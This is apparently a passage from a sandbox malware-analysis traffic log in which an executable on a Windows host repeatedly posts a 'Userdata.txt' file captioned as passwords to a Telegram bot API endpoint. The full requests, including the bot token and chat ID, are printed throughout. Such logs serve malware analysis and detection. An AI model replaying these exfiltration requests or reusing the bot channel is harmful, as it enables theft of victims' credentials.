2025-01-10 21:44:20 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 61 33 65 32 38 34 32 65 38 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd33a3e2842e8eContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:44:21 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:44:21 GMT Content-Type: application/json Content-Length: 546 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:44:21 UTC	546	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 34 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 36 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43647,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545461,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.6	50043	149.154.167.220	443	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:44:22 UTC	298	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd33bdc8e3eade Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:44:22 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 62 64 63 38 65 33 65 61 64 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd33bdc8e3eadeContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:44:23 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:44:22 GMT Content-Type: application/json Content-Length: 545 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:44:23 UTC	545	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 34 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 36 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43648,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545462,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.6	50045	149.154.167.220	443	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:44:24 UTC	298	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd33d8e5a89915 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:44:24 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 64 38 65 35 61 38 39 39 31 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd33d8e5a89915Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:44:24 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:44:24 GMT Content-Type: application/json Content-Length: 545 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:44:24 UTC	545	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 34 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 36 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43649,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545464,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.6	50047	149.154.167.220	443	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:44:25 UTC	298	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd33f53b4a9af3 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:44:25 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 66 35 33 62 34 61 39 61 66 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd33f53b4a9af3Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:44:26 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:44:26 GMT Content-Type: application/json Content-Length: 545 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:44:26 UTC	545	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 35 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 36 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43650,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545465,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.6	50049	149.154.167.220	443	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:44:27 UTC	298	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd3412c5964a4a Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:44:27 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 31 32 63 35 39 36 34 61 34 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd3412c5964a4aContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:44:27 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:44:27 GMT Content-Type: application/json Content-Length: 545 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:44:27 UTC	545	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 35 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 36 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43651,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545467,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.6	50051	149.154.167.220	443	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:44:28 UTC	298	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd3432c65a2e7c Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:44:28 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 33 32 63 36 35 61 32 65 37 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd3432c65a2e7cContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:44:29 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:44:29 GMT Content-Type: application/json Content-Length: 545 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:44:29 UTC	545	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 35 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 36 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43652,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545469,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.6	50053	149.154.167.220	443	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:44:30 UTC	298	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd34590f156764 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:44:30 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 35 39 30 66 31 35 36 37 36 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd34590f156764Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:44:30 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:44:30 GMT Content-Type: application/json Content-Length: 545 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:44:30 UTC	545	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 35 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 37 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43653,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545470,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.6	50055	149.154.167.220	443	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:44:32 UTC	298	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd347a37ca4cc1 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:44:32 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 37 61 33 37 63 61 34 63 63 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd347a37ca4cc1Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:44:32 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:44:32 GMT Content-Type: application/json Content-Length: 545 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
